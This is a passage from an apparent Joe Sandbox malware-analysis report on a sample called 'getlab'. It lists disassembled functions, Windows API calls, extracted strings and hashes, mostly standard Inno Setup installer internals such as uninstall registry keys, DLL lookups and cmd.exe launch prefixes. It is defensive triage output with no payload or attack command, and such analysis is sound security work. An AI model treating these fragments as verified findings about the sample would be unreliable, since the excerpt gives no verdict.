                                                                          • Instruction Fuzzy Hash: 40125334A001089BDB04EF56E991ADE73F5FB48304F60807BE8506B765EB78BD45CB5A

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000,00000000,00492239,?,?,?,?,00000000,00000000,00000000), ref: 00491D84
                                                                          • FindWindowA.USER32(00000000,00000000), ref: 00491DB5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FindSleepWindow
                                                                          • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                          • API String ID: 3078808852-3310373309
                                                                          • Opcode ID: 58a090b98d9e381863c78da40cb00c9745695e2105e43b1ea83f897cb27ba63d
                                                                          • Instruction ID: dc8cd37179c6c7efec8ae072485b7dd58185b77a9baa1073e2e80a3326dd0ce5
                                                                          • Opcode Fuzzy Hash: 58a090b98d9e381863c78da40cb00c9745695e2105e43b1ea83f897cb27ba63d
                                                                          • Instruction Fuzzy Hash: 6CC19360B043406BDB24BF7E9D4291A59999F98708711897FB846EB38BCE7CDC0E439D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483049
                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483056
                                                                          • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483064
                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0048306C
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483078
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483099
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004830AC
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 004830B2
                                                                          • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004830C9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                          • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                          • API String ID: 2230631259-2623177817
                                                                          • Opcode ID: 19051ef92357407474476a60c046aa04f8c513acd1fb492cc3cf86325791a6e5
                                                                          • Instruction ID: af3d4bc633e3fac8e2117acd109dd394a62660f1f52edacbaea6f09291502d38
                                                                          • Opcode Fuzzy Hash: 19051ef92357407474476a60c046aa04f8c513acd1fb492cc3cf86325791a6e5
                                                                          • Instruction Fuzzy Hash: 9211B69010574194DA117B764C5E76F19888B12F1BF140C3BB880662DBEABD8F45CB2F

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(?,00468DCA,?,?,00000001,00000000,00000000,00468DE5,?,00000000,00000000,?), ref: 00468DB3
                                                                          Strings
                                                                          • Inno Setup: Setup Type, xrefs: 00468CC2
                                                                          • %s\%s_is1, xrefs: 00468C2D
                                                                          • Inno Setup: Selected Tasks, xrefs: 00468D1F
                                                                          • Inno Setup: User Info: Serial, xrefs: 00468D95
                                                                          • Inno Setup: No Icons, xrefs: 00468C9B
                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468C0F
                                                                          • Inno Setup: Deselected Components, xrefs: 00468CF4
                                                                          • Inno Setup: Icon Group, xrefs: 00468C8E
                                                                          • Inno Setup: Selected Components, xrefs: 00468CD2
                                                                          • Inno Setup: Deselected Tasks, xrefs: 00468D41
                                                                          • Inno Setup: App Path, xrefs: 00468C72
                                                                          • Inno Setup: User Info: Name, xrefs: 00468D6F
                                                                          • Inno Setup: User Info: Organization, xrefs: 00468D82
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 47109696-1093091907
                                                                          • Opcode ID: 8db79232fb2f2725b9adfe70d64749861c257aff0263038353b857e31bb30bb7
                                                                          • Instruction ID: 9409bd20b999dcc9be58dd01f280802f9f4acbf4d31626fc1b9235e67c3febe1
                                                                          • Opcode Fuzzy Hash: 8db79232fb2f2725b9adfe70d64749861c257aff0263038353b857e31bb30bb7
                                                                          • Instruction Fuzzy Hash: B451C430A006489BCB11DB65C9917DEB7F5EF98304F50816FE840A7391EB78AE41CB19

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 0041F3BC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                                          • GetClassInfoA.USER32(00400000,00423674), ref: 00423897
                                                                          • RegisterClassA.USER32(00499630), ref: 004238AF
                                                                          • GetSystemMetrics.USER32(00000000), ref: 004238D1
                                                                          • GetSystemMetrics.USER32(00000001), ref: 004238E0
                                                                          • SetWindowLongA.USER32(00410648,000000FC,00423684), ref: 0042393C
                                                                          • SendMessageA.USER32(00410648,00000080,00000001,00000000), ref: 0042395D
                                                                          • GetSystemMenu.USER32(00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423968
                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423977
                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423984
                                                                          • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000), ref: 0042399A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                          • String ID: t6B
                                                                          • API String ID: 183575631-3178735703
                                                                          • Opcode ID: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                                          • Instruction ID: b8adc5bb76ba60810a7e15457cf144511173abf09441cb7f9a8677178c11600e
                                                                          • Opcode Fuzzy Hash: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                                          • Instruction Fuzzy Hash: 003150B17402006AE710BF699C82F6A37989B14709F60017AFA44EF2D7C6BDED44876D

Control-flow Graph (rendered as an image in the original report, with executed and not-executed basic blocks marked): function 0047C65C, basic blocks 47c65c-47c796; calls to 42c3f4, 4035c0, 47c320, 4525ac, 453318, 403494, 42e38c, 4078e4, 403400 and one GetProcAddress site (47c753-47c76d).
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(73400000,SHGetFolderPathA), ref: 0047C75E
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$imI$shell32.dll$shfolder.dll
                                                                          • API String ID: 190572456-2091577475
                                                                          • Opcode ID: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                                          • Instruction ID: 1bc5907ccbf8c7c126ff73efdb0a93079a3df87e782a300c574b3872d81dfa42
                                                                          • Opcode Fuzzy Hash: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                                          • Instruction Fuzzy Hash: BF311D30A00149DBCB00EFA9D9D29DEB7B5EB44305F61847BE404E7241DB389E45CBAD

Control-flow Graph (rendered as an image in the original report, with executed and not-executed basic blocks marked): function 0040631C, basic blocks 40631c-406369; GetModuleHandleA followed by three GetProcAddress lookups, with the SetProcessDEPPolicy call (406364-406366) on one of the two branches after the last lookup.
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                          • API String ID: 3256987805-3653653586
                                                                          • Opcode ID: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                                          • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                          • Opcode Fuzzy Hash: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                                          • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                          APIs
                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                                          • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                                          • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$Prop
                                                                          • String ID: wA$yA
                                                                          • API String ID: 3887896539-1847240991
                                                                          • Opcode ID: f90247c629a947c585d53ebd803f71ac5ff518e129def1d5e0d2b734115b4926
                                                                          • Instruction ID: c74ba7ed2530cb1b13d42f77b59a1a0282e776654e1e26cace8cc99fbade548e
                                                                          • Opcode Fuzzy Hash: f90247c629a947c585d53ebd803f71ac5ff518e129def1d5e0d2b734115b4926
                                                                          • Instruction Fuzzy Hash: E922D06108E3C05FE3279B74896A5D17FA0EE23326B1D45DFC4C28B1A3D61D8A87C71A

Control-flow Graph (rendered as an image in the original report, with executed and not-executed basic blocks marked): function 0042F558, basic blocks 42f558-42f666; calls to 402d30, 402b30, 41ee9c, 424274, 403738, 403400 and to GetActiveWindow, GetFocus, RegisterClassA, CreateWindowExA (two sites), ShowWindow and SetFocus.
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 0042F587
                                                                          • GetFocus.USER32 ref: 0042F58F
                                                                          • RegisterClassA.USER32(004997AC), ref: 0042F5B0
                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F684,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5EE
                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F634
                                                                          • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F645
                                                                          • SetFocus.USER32(00000000,00000000,0042F667,?,?,?,00000001,00000000,?,00458172,00000000,0049B628), ref: 0042F64C
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                          • String ID: TWindowDisabler-Window
                                                                          • API String ID: 3167913817-1824977358
                                                                          • Opcode ID: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                                          • Instruction ID: 4511064fd05a7bbda13c40d4eeb951e72c3c37d4b9ac5deb9698ad8496ae2c71
                                                                          • Opcode Fuzzy Hash: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                                          • Instruction Fuzzy Hash: B621A171740710BAE220EF61AD43F1A76B8EB14B04F91453BF504AB2E1D7B9AD0586AD

Control-flow Graph (rendered as an image in the original report, with executed and not-executed basic blocks marked): function 004531C4, basic blocks 4531c4-45325c; two GetModuleHandleA/GetProcAddress lookup pairs in the first block, then calls to 42e38c, 42e8c0 and 403400.
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                          • API String ID: 1646373207-2130885113
                                                                          • Opcode ID: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                                          • Instruction ID: 97fdcfa8d8ba184edd095c4085c6b9ff9a8965db98d5396ade8c15ee503d7826
                                                                          • Opcode Fuzzy Hash: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                                          • Instruction Fuzzy Hash: 5D018870244B05AED701BF73AD02F5A7A58DB0579BF5004BBF81496183D77C4A08CAAD
                                                                          APIs
                                                                          • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                                            • Part of subcall function 00466EE8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466F80
                                                                            • Part of subcall function 00466EE8: DestroyCursor.USER32(00000000), ref: 00466F96
                                                                          • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                                          • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467129
                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046714F
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                          • String ID: c:\directory$shell32.dll
                                                                          • API String ID: 3376378930-1375355148
                                                                          • Opcode ID: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                                          • Instruction ID: 289419416c676a83544b633f3186a9d007cfc28e75d1c6b72818de0571a1fc75
                                                                          • Opcode Fuzzy Hash: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                                          • Instruction Fuzzy Hash: ED515E74604244AFDB11DF65DD85FCFB7A8EB49308F5081B7F40897352D638AE81CA59
                                                                          APIs
                                                                          • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430940
                                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043094F
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00430969
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 0043098A
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                          • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                          • API String ID: 4130936913-2943970505
                                                                          • Opcode ID: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                                          • Instruction ID: fc358bcdd7e5b0606a48ee3fdcf498d476493da3f5408fce691eb0e46a0d48ea
                                                                          • Opcode Fuzzy Hash: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                                          • Instruction Fuzzy Hash: D0F082B04583409AE300EB25994271E77D0EF58318F10463FF898A6392D7385900CB6F
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200,00000000), ref: 0045518E
                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200), ref: 0045519B
                                                                            • Part of subcall function 00454F50: WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                                            • Part of subcall function 00454F50: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                                            • Part of subcall function 00454F50: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                                            • Part of subcall function 00454F50: CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                          • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                          • API String ID: 854858120-615399546
                                                                          • Opcode ID: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                                          • Instruction ID: 453c4c1e4331516b603b6bd36f4112f8bfb414d7ddeab97af99533fe31520792
                                                                          • Opcode Fuzzy Hash: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                                          • Instruction Fuzzy Hash: 7A516C34B0074D6BDB11EF95C852BEEBBB9AF44305F50407BB804B7293D7789A098B59
                                                                          APIs
                                                                          • LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                                          • OemToCharA.USER32(?,?), ref: 00423754
                                                                          • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Char$FileIconLoadLowerModuleName
                                                                          • String ID: 2$MAINICON
                                                                          • API String ID: 3935243913-3181700818
                                                                          • Opcode ID: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                                          • Instruction ID: 89b1690b288838b812280c83b83aa3621e89473e571b5a361368100100c68adf
                                                                          • Opcode Fuzzy Hash: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                                          • Instruction Fuzzy Hash: BD31D570A042559ADB10EF69C8C57CA3BE89F14308F4441BAE844DB383D7BED988CB59
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,?,00000000), ref: 00494A25
                                                                            • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00494A47
